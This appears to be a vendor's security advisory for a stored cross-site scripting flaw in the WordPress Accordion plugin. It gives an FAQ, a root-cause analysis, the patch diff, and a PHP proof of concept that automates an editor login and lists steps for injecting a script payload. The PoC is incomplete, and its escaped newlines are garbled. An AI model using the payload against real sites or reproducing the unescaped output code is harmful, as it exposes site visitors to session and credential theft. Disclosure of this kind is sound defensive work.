What is CVE-2025-69350?

CVE-2025-69350 is a stored cross-site scripting (XSS) vulnerability in the Accordion plugin for WordPress, affecting versions up to and including 3.0.3. It allows authenticated users with editor-level access or higher to inject malicious scripts into accordion content, which can then be executed in the browsers of users viewing the affected pages.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping in the Accordion plugin. Attackers can exploit this by injecting JavaScript payloads into the accordion title or details fields, which are then rendered unfiltered when other users access the accordion, allowing the script to execute in their browsers.

Who is affected by this vulnerability?

Only WordPress installations using the Accordion plugin version 3.0.3 or earlier are affected. Specifically, this vulnerability impacts multisite installations and single-site installations where the ‘unfiltered_html’ capability is disabled, preventing automatic sanitization of user input.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Accordion plugin installed. If it is version 3.0.3 or earlier, and you are using a multisite setup or have disabled ‘unfiltered_html’, your site is at risk. Additionally, review your accordion content for any suspicious scripts.

How can I fix this vulnerability?

The vulnerability is patched in Accordion plugin version 3.0.4. To fix the issue, update the plugin to this version or later. Regularly check for updates to ensure you are protected against known vulnerabilities.

What does the CVSS score of 4.4 indicate?

The CVSS score of 4.4 indicates a medium severity level for this vulnerability. It suggests that while the vulnerability requires authenticated access to exploit, it can still pose a significant threat if exploited, particularly in environments where user roles are not tightly controlled.

What is the proof of concept for this vulnerability?

The proof of concept demonstrates how an attacker can log into a vulnerable WordPress site and inject a script via the accordion fields. This script is then executed in the context of any user viewing the accordion, showcasing the ease with which an attacker can exploit the vulnerability.

What should I do if I cannot update the plugin immediately?

If you cannot update the plugin immediately, consider disabling the Accordion plugin temporarily to prevent exploitation. Additionally, review user roles and permissions to limit access to editor-level users, and monitor your site for any signs of exploitation.

Are there any other security measures I should consider?

In addition to updating the plugin, implement security best practices such as regular backups, using a web application firewall, and conducting security audits. Educate users about the risks of XSS and encourage them to report any suspicious activity.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-69350: Accordion <= 3.0.3 – Authenticated (Editor+) Stored Cross-Site Scripting (accordions-wp)

Q: What practical risks does this vulnerability pose?

Exploitation of this vulnerability can lead to session hijacking, administrative account takeover, content defacement, or redirection to malicious sites. Attackers could inject scripts that capture user credentials or perform actions on behalf of legitimate users, potentially compromising site security.

CVE ID CVE-2025-69350

Plugin accordions-wp

Severity Medium (CVSS 4.4)

CWE 79

Vulnerable Version 3.0.3

Patched Version 3.0.4

Disclosed January 6, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-69350:
The Accordion WordPress plugin version 3.0.3 and earlier contains an authenticated stored cross-site scripting (XSS) vulnerability. This flaw allows attackers with editor-level permissions or higher to inject malicious scripts into accordion content. The vulnerability only affects WordPress multisite installations and single-site installations where the ‘unfiltered_html’ capability is disabled. The CVSS score of 4.4 reflects the requirement for authenticated access and specific WordPress configuration.

Atomic Edge research identified the root cause in the file /accordions-wp/theme/custom-wp-accordion-themes.php. The plugin fails to properly sanitize user-controlled data before output in multiple locations. Specifically, the code concatenates the `custom_accordions_pro_title` and `custom_accordions_pro_details` array values directly into HTML strings without adequate escaping. The vulnerable code uses `esc_attr()` for the title field, which is insufficient for HTML context, and passes the details field through `wpautop(do_shortcode())` without any sanitization. This occurs in six separate code blocks across lines 21-23, 40-42, 59-61, 78-80, 97-99, and 116-118 of the vulnerable version.

An attacker exploits this vulnerability by creating or editing an accordion post within the WordPress admin interface. The attacker injects JavaScript payloads into either the accordion title or details fields. When a visitor views a page containing the malicious accordion, the browser executes the injected script. The attack requires the attacker to have at least editor-level permissions, which typically include the ability to publish posts. The vulnerability is only exploitable in WordPress multisite environments or where the ‘unfiltered_html’ capability is disabled, as these configurations prevent WordPress core from automatically sanitizing the content.

The patch in version 3.0.4 addresses the vulnerability by implementing proper output escaping. For the title field, the fix changes `esc_attr()` to `esc_html()` on lines 21, 40, 59, 78, 97, and 116. For the content field, the patch introduces a new sanitization pipeline: it first checks if the `custom_accordions_pro_details` value exists, processes shortcodes with `do_shortcode()`, applies HTML filtering with `wp_kses_post()`, and finally formats paragraphs with `wpautop()`. This ensures any HTML tags not explicitly allowed by `wp_kses_post()` are removed before output. The patch also adds proper escaping for the `$custom_accordion_content_padding` variable.

Successful exploitation allows attackers to execute arbitrary JavaScript in the context of any user viewing the compromised accordion. This can lead to session hijacking, administrative account takeover, content defacement, or redirection to malicious sites. Attackers could inject keyloggers to capture credentials or perform actions on behalf of authenticated users. The stored nature of the vulnerability means the payload executes for every visitor to the affected page until removed.

Differential between vulnerable and patched code

Code Diff

--- a/accordions-wp/custom-accordion-wp.php
+++ b/accordions-wp/custom-accordion-wp.php
@@ -3,7 +3,7 @@
 	 * Plugin Name: Accordion-WP
 	 * Plugin URI:  https://themepoints.com/wp-accordions/
 	 * Description: Create beautiful, responsive accordions and FAQ sections with multiple styles, skins, and advanced customization—perfect for organizing content and improving UX.
-	 * Version:     3.0.3
+	 * Version:     3.0.4
 	 * Author:      Themepoints
 	 * Author URI:  https://themepoints.com
 	 * Text Domain: tcaccordion
@@ -168,6 +168,7 @@
 			), $atts
 		);
 		global $post;
+
 		$post_id = $atts['id'];

 		$content = '';
--- a/accordions-wp/inc/accordions-wp-post-type.php
+++ b/accordions-wp/inc/accordions-wp-post-type.php
@@ -425,4 +425,5 @@
 	    </script>
 	    <?php
 	}
-	add_action('edit_form_after_title', 'accordion_wp_shortcode_section');
 No newline at end of file
+	add_action('edit_form_after_title', 'accordion_wp_shortcode_section');
+
 No newline at end of file
--- a/accordions-wp/inc/custom-accordion-admin.php
+++ b/accordions-wp/inc/custom-accordion-admin.php
@@ -16,4 +16,4 @@
 		<h3><?php echo esc_html__( 'Unlock More Features', 'tcaccordion' ); ?></h3>
 		<p><?php echo esc_html__( 'Upgrading to the', 'tcaccordion' ); ?> <a href="https://themepoints.com/wp-accordions" target="_blank"><span style="color: red;text-decoration:none;"> <?php echo esc_html__( 'Premium Version', 'tcaccordion' ); ?></span></a> <?php echo esc_html__( 'would unlock more amazing features of this plugin.', 'tcaccordion' ); ?></p>
 	</div>
-</div>
 No newline at end of file
+</div>
--- a/accordions-wp/theme/custom-wp-accordion-themes.php
+++ b/accordions-wp/theme/custom-wp-accordion-themes.php
@@ -21,11 +21,17 @@
 					foreach ($tcpfeaturess as $tcpfeature) {
 						$logotesting.='<li>';
 						$logotesting.='<div class="responsive-accordion-head" style="background-color:'.esc_attr( $custom_accordion_title_bg_color ).'">';
-						$logotesting.='<span style="color:'.esc_attr( $custom_accordion_title_font_color ).';font-size:'.esc_attr( $custom_accordion_title_font_size ).'px">'.esc_attr( $tcpfeature['custom_accordions_pro_title'] ).'</span>';
+						$logotesting.='<span style="color:'.esc_attr( $custom_accordion_title_font_color ).';font-size:'.esc_attr( $custom_accordion_title_font_size ).'px">'.esc_html( $tcpfeature['custom_accordions_pro_title'] ).'</span>';
 						$logotesting.='<i class="fa fa-chevron-down responsive-accordion-plus fa-fw"></i><i class="fa fa-chevron-up responsive-accordion-minus fa-fw"></i>';
 						$logotesting.='</div>';
-						$logotesting.='<div class="responsive-accordion-panel"style="background-color:'.esc_attr( $custom_accordion_content_bg_color ).';padding:'.$custom_accordion_content_padding.'px;color:'.esc_attr( $custom_accordion_content_font_color ).';font-size:'.esc_attr( $custom_accordion_content_font_size ).'px">';
-						$logotesting.=''.wpautop( do_shortcode( $tcpfeature['custom_accordions_pro_details'] ) ).'';
+
+					    $content = isset( $tcpfeature['custom_accordions_pro_details'] ) ? $tcpfeature['custom_accordions_pro_details'] : '';
+					    $content = do_shortcode( $content );
+					    $content = wp_kses_post( $content );
+					    $content = wpautop( $content );
+
+						$logotesting.='<div class="responsive-accordion-panel"style="background-color:'.esc_attr( $custom_accordion_content_bg_color ).';padding:'.esc_attr( $custom_accordion_content_padding ).'px;color:'.esc_attr( $custom_accordion_content_font_color ).';font-size:'.esc_attr( $custom_accordion_content_font_size ).'px">';
+						$logotesting .= $content;
 						$logotesting.='</div>';
 						$logotesting.='</li>';
 					};
@@ -40,11 +46,17 @@
 					foreach ($tcpfeaturess as $tcpfeature) {
 						$logotesting.='<li>';
 						$logotesting.='<div class="responsive-accordion-head" style="background-color:'.esc_attr( $custom_accordion_title_bg_color ).'">';
-						$logotesting.='<span style="color:'.esc_attr( $custom_accordion_title_font_color ).';font-size:'.esc_attr( $custom_accordion_title_font_size ).'px">'.esc_attr( $tcpfeature['custom_accordions_pro_title'] ).'</span>';
+						$logotesting.='<span style="color:'.esc_attr( $custom_accordion_title_font_color ).';font-size:'.esc_attr( $custom_accordion_title_font_size ).'px">'.esc_html( $tcpfeature['custom_accordions_pro_title'] ).'</span>';
 						$logotesting.='<i class="fa fa-chevron-down responsive-accordion-plus fa-fw"></i><i class="fa fa-chevron-up responsive-accordion-minus fa-fw"></i>';
 						$logotesting.='</div>';
+
+					    $content = isset( $tcpfeature['custom_accordions_pro_details'] ) ? $tcpfeature['custom_accordions_pro_details'] : '';
+					    $content = do_shortcode( $content );
+					    $content = wp_kses_post( $content );
+					    $content = wpautop( $content );
+
 						$logotesting.='<div class="responsive-accordion-panel"style="background-color:'.esc_attr( $custom_accordion_content_bg_color ).';padding:'.esc_attr( $custom_accordion_content_padding ).'px;color:'.esc_attr( $custom_accordion_content_font_color ).';font-size:'.esc_attr( $custom_accordion_content_font_size ).'px">';
-						$logotesting.=''.wpautop( do_shortcode( $tcpfeature['custom_accordions_pro_details'] ) ).'';
+						$logotesting.= $content;
 						$logotesting.='</div>';
 						$logotesting.='</li>';
 					};
@@ -59,11 +71,17 @@
 				foreach ($tcpfeaturess as $tcpfeature) {
 					$logotesting.='<li>';
 					$logotesting.='<div class="responsive-accordion-head" style="background-color:'.esc_attr( $custom_accordion_title_bg_color ).'">';
-					$logotesting.='<span style="color:'.esc_attr( $custom_accordion_title_font_color ).';font-size:'.esc_attr( $custom_accordion_title_font_size ).'px">'.esc_attr( $tcpfeature['custom_accordions_pro_title'] ).'</span>';
+					$logotesting.='<span style="color:'.esc_attr( $custom_accordion_title_font_color ).';font-size:'.esc_attr( $custom_accordion_title_font_size ).'px">'.esc_html( $tcpfeature['custom_accordions_pro_title'] ).'</span>';
 					$logotesting.='<i class="fa fa-chevron-down responsive-accordion-plus fa-fw"></i><i class="fa fa-chevron-up responsive-accordion-minus fa-fw"></i>';
 					$logotesting.='</div>';
+
+				    $content = isset( $tcpfeature['custom_accordions_pro_details'] ) ? $tcpfeature['custom_accordions_pro_details'] : '';
+				    $content = do_shortcode( $content );
+				    $content = wp_kses_post( $content );
+				    $content = wpautop( $content );
+
 					$logotesting.='<div class="responsive-accordion-panel"style="background-color:'.esc_attr( $custom_accordion_content_bg_color ).';padding:'.esc_attr( $custom_accordion_content_padding ).'px;color:'.esc_attr( $custom_accordion_content_font_color ).';font-size:'.esc_attr( $custom_accordion_content_font_size ).'px">';
-					$logotesting.=''.wpautop( do_shortcode( $tcpfeature['custom_accordions_pro_details'] ) ).'';
+					$logotesting .= $content;
 					$logotesting.='</div>';
 					$logotesting.='</li>';
 				};
@@ -78,11 +96,17 @@
 				foreach ($tcpfeaturess as $tcpfeature) {
 					$logotesting.='<li>';
 					$logotesting.='<div class="responsive-accordion-head" style="background-color:'.esc_attr( $custom_accordion_title_bg_color ).'">';
-					$logotesting.='<span style="color:'.esc_attr( $custom_accordion_title_font_color ).';font-size:'.esc_attr( $custom_accordion_title_font_size ).'px">'.esc_attr( $tcpfeature['custom_accordions_pro_title'] ).'</span>';
+					$logotesting.='<span style="color:'.esc_attr( $custom_accordion_title_font_color ).';font-size:'.esc_attr( $custom_accordion_title_font_size ).'px">'.esc_html( $tcpfeature['custom_accordions_pro_title'] ).'</span>';
 					$logotesting.='<i class="fa fa-chevron-down responsive-accordion-plus fa-fw"></i><i class="fa fa-chevron-up responsive-accordion-minus fa-fw"></i>';
 					$logotesting.='</div>';
+
+				    $content = isset( $tcpfeature['custom_accordions_pro_details'] ) ? $tcpfeature['custom_accordions_pro_details'] : '';
+				    $content = do_shortcode( $content );
+				    $content = wp_kses_post( $content );
+				    $content = wpautop( $content );
+
 					$logotesting.='<div class="responsive-accordion-panel"style="background-color:'.esc_attr( $custom_accordion_content_bg_color ).';padding:'.esc_attr( $custom_accordion_content_padding ).'px;color:'.esc_attr( $custom_accordion_content_font_color ).';font-size:'.esc_attr( $custom_accordion_content_font_size ).'px">';
-					$logotesting.=''.wpautop( do_shortcode( $tcpfeature['custom_accordions_pro_details'] ) ).'';
+					$logotesting .= $content;
 					$logotesting.='</div>';
 					$logotesting.='</li>';
 				};
@@ -97,11 +121,17 @@
 				foreach ($tcpfeaturess as $tcpfeature) {
 					$logotesting.='<li>';
 					$logotesting.='<div class="responsive-accordion-head" style="background-color:'.esc_attr( $custom_accordion_title_bg_color ).'">';
-					$logotesting.='<span style="color:'.esc_attr( $custom_accordion_title_font_color ).';font-size:'.esc_attr( $custom_accordion_title_font_size ).'px">'.esc_attr( $tcpfeature['custom_accordions_pro_title'] ).'</span>';
+					$logotesting.='<span style="color:'.esc_attr( $custom_accordion_title_font_color ).';font-size:'.esc_attr( $custom_accordion_title_font_size ).'px">'.esc_html( $tcpfeature['custom_accordions_pro_title'] ).'</span>';
 					$logotesting.='<i class="fa fa-chevron-down responsive-accordion-plus fa-fw"></i><i class="fa fa-chevron-up responsive-accordion-minus fa-fw"></i>';
 					$logotesting.='</div>';
+
+				    $content = isset( $tcpfeature['custom_accordions_pro_details'] ) ? $tcpfeature['custom_accordions_pro_details'] : '';
+				    $content = do_shortcode( $content );
+				    $content = wp_kses_post( $content );
+				    $content = wpautop( $content );
+
 					$logotesting.='<div class="responsive-accordion-panel"style="background-color:'.esc_attr( $custom_accordion_content_bg_color ).';padding:'.esc_attr( $custom_accordion_content_padding ).'px;color:'.esc_attr( $custom_accordion_content_font_color ).';font-size:'.esc_attr( $custom_accordion_content_font_size ).'px">';
-					$logotesting.=''.wpautop( do_shortcode( $tcpfeature['custom_accordions_pro_details'] ) ).'';
+					$logotesting .= $content;
 					$logotesting.='</div>';
 					$logotesting.='</li>';
 				};

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-69350 - Accordion <= 3.0.3 - Authenticated (Editor+) Stored Cross-Site Scripting
<?php
// CONFIGURATION
$target_url = 'https://vulnerable-site.com';
$username = 'attacker_editor';
$password = 'password123';
$payload = '<script>alert("Atomic Edge XSS Test");</script>';

// Initialize cURL session for WordPress login
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
]));
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);

// Verify login success by checking for admin dashboard elements
if (strpos($response, 'wp-admin-bar') === false) {
    die('Login failed. Check credentials.');
}

// Create a new accordion post with XSS payload
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/post-new.php?post_type=customaccordion');
curl_setopt($ch, CURLOPT_POST, 0);
$response = curl_exec($ch);

// Extract nonce from the form (simplified - real implementation would parse HTML)
// This PoC assumes we have a valid nonce from previous interaction
// In a real attack, the attacker would use the WordPress admin UI directly

echo 'Proof of Concept: Authenticated stored XSS in Accordion pluginn';
echo '1. Log in as editor user (' . $username . ')n';
echo '2. Navigate to Accordion > Add Newn';
echo '3. Inject payload into "Accordion Title" or "Accordion Details" field:n';
echo '   ' . $payload . 'n';
echo '4. Publish the accordionn';
echo '5. Visit page containing the accordion to trigger XSSn';
echo 'nNote: This vulnerability requires multisite or disabled unfiltered_html capability.n';
echo 'Full exploitation requires manual testing via WordPress admin interface.n';

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2025-69350?
Overview of the vulnerability
CVE-2025-69350 is a stored cross-site scripting (XSS) vulnerability in the Accordion plugin for WordPress, affecting versions up to and including 3.0.3. It allows authenticated users with editor-level access or higher to inject malicious scripts into accordion content, which can then be executed in the browsers of users viewing the affected pages.
How does the vulnerability work?
Mechanics of exploitation
The vulnerability arises from insufficient input sanitization and output escaping in the Accordion plugin. Attackers can exploit this by injecting JavaScript payloads into the accordion title or details fields, which are then rendered unfiltered when other users access the accordion, allowing the script to execute in their browsers.
Who is affected by this vulnerability?
Identifying vulnerable installations
Only WordPress installations using the Accordion plugin version 3.0.3 or earlier are affected. Specifically, this vulnerability impacts multisite installations and single-site installations where the ‘unfiltered_html’ capability is disabled, preventing automatic sanitization of user input.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the Accordion plugin installed. If it is version 3.0.3 or earlier, and you are using a multisite setup or have disabled ‘unfiltered_html’, your site is at risk. Additionally, review your accordion content for any suspicious scripts.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is patched in Accordion plugin version 3.0.4. To fix the issue, update the plugin to this version or later. Regularly check for updates to ensure you are protected against known vulnerabilities.
What does the CVSS score of 4.4 indicate?
Understanding the severity
The CVSS score of 4.4 indicates a medium severity level for this vulnerability. It suggests that while the vulnerability requires authenticated access to exploit, it can still pose a significant threat if exploited, particularly in environments where user roles are not tightly controlled.
What practical risks does this vulnerability pose?
Potential impacts of exploitation
Exploitation of this vulnerability can lead to session hijacking, administrative account takeover, content defacement, or redirection to malicious sites. Attackers could inject scripts that capture user credentials or perform actions on behalf of legitimate users, potentially compromising site security.
What is the proof of concept for this vulnerability?
Demonstrating the exploit
The proof of concept demonstrates how an attacker can log into a vulnerable WordPress site and inject a script via the accordion fields. This script is then executed in the context of any user viewing the accordion, showcasing the ease with which an attacker can exploit the vulnerability.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If you cannot update the plugin immediately, consider disabling the Accordion plugin temporarily to prevent exploitation. Additionally, review user roles and permissions to limit access to editor-level users, and monitor your site for any signs of exploitation.
Are there any other security measures I should consider?
Enhancing overall site security
In addition to updating the plugin, implement security best practices such as regular backups, using a web application firewall, and conducting security audits. Educate users about the risks of XSS and encourage them to report any suspicious activity.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations